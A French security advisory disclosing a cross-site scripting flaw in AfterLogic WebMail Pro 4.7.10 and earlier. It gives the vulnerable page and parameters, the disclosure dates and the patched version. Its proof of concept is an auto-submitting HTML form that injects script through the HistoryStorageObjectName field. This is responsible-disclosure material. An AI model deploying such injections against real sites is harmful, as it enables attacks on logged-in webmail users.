GVI 2009-01
Avis de sécurité : AfterLogic WebMail Pro vulnérable au Cross-Site Scripting

Description
-------------
AfterLogic WebMail Pro est vulnérable au Cross-Site Scripting, permettant 
l'inclusion de code malicieux dans le contexte de l'application.

Produit
-----------
Description tirée de http://www.afterlogic.com/products/webmail-pro : 
"Webmail front-end for your existing POP3/IMAP mail server. Offer your users 
the fast AJAX webmail and innovative calendar with sharing. Stay in control 
with the admin panel and the developer's API."

Détails
--------
Produit affecté : AfterLogic WebMail Pro <= 4.7.10
Type de vulnérabilité : Cross-Site Scripting (XSS)
Page vulnérable : history-storage.aspx
Paramètres vulnérables : HistoryKey, HistoryStorageObjectName
Découvert par : Sébastien Duquette (http://intheknow-security.blogspot.com) 
						de Gardien Virtuel (www.gardienvirtuel.com)
Avis de sécurité : http://www.gardienvirtuel.com/fichiers/documents/publications/GVI_2009-01_FR.txt

Dates
----------
Problème découvert : 18 septembre 2009
Fabricant avisé : 23 septembre 2009
Publication du correctif: 30 septembre 2009
Publication de l'avis : 5 octobre 2009

Preuve de concept
-------------------
La victime doit être authentifiée dans l'application. Cette preuve de concept a
été testée dans Firefox 3.5 et Internet Explorer 8.

<html>
<head>
</head>
<body onLoad="document.form1.submit()">
<form name="form1" method="post"
action="http://WEBSITE/history-storage.aspx?param=0.21188772204998574"
onSubmit="return false;">
<input type="hidden" name="HistoryKey" value="value"/>
<input type="hidden" name="HistoryStorageObjectName" value="location;
alert('xss'); //"/>
</form>
</body>
</html>

Solution
---------
Mettre le logiciel à jour à la version AfterLogic Webmail Pro 4.7.11